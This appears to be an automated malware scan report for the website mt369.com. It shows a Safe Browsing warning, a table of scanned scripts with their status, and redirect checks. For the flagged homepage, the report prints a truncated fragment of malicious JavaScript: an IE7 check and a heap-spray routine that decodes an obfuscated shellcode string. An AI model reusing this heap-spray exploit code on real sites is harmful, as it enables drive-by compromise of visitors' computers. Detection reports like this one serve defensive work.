Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mt369.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.mt369.com/ | 200 OK Content-Length: 9873 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)location.replace("about:blank"); function sleep(milliseconds) { var start=new Date().getTime(); for(var i=0;i<1e7;i++) {if((new Date().getTime()-start)>milliseconds) {break} } } function spray(sc) { var infect=unescape(sc.replace(/dadong/g,"\x25\x75")); var heapBlockSize=0x100000; var payLoadSize=infect.length*2; var szlong=heapBlockSize-( var i=1;while(i<=10) { window.status=" ";i++} } Antivirus reports:
| ||
http://cbjs.baidu.com/js/m.js | 200 OK Content-Length: 30494 Content-Type: application/x-javascript | clean |
http://www.mt369.com/test404page.js | HTTP/1.1 404 Not Found Connection: close Date: Mon, 30 Jun 2014 08:44:40 GMT Server: kangle/3.3.8 Content-Length: 600 Content-Type: text/html; charset=utf-8 | clean |
http://errorpage.webcamcn.com/?code=404 | 200 OK Content-Length: 8249 Content-Type: text/html | clean |
http://cpro.baidustatic.com/cpro/ui/c.js | 200 OK Content-Length: 66896 Content-Type: application/x-javascript | clean |
http://images.sohu.com/cs/jsfile/js/c.js | 200 OK Content-Length: 48191 Content-Type: application/x-javascript | clean |
http://images.sohu.com/cs/jsfile/js/l.js | 200 OK Content-Length: 46950 Content-Type: application/x-javascript | clean |
http://cpro.baidustatic.com/cpro/ui/f.js | 200 OK Content-Length: 66896 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mt369.com
Result:
GET / HTTP/1.1
Host: mt369.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mt369.com
Referer: http://www.google.com/search?q=mt369.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mt369.com
Referer: http://www.google.com/search?q=mt369.com
Result:
The result is similar to the first query. There are no suspicious redirects found.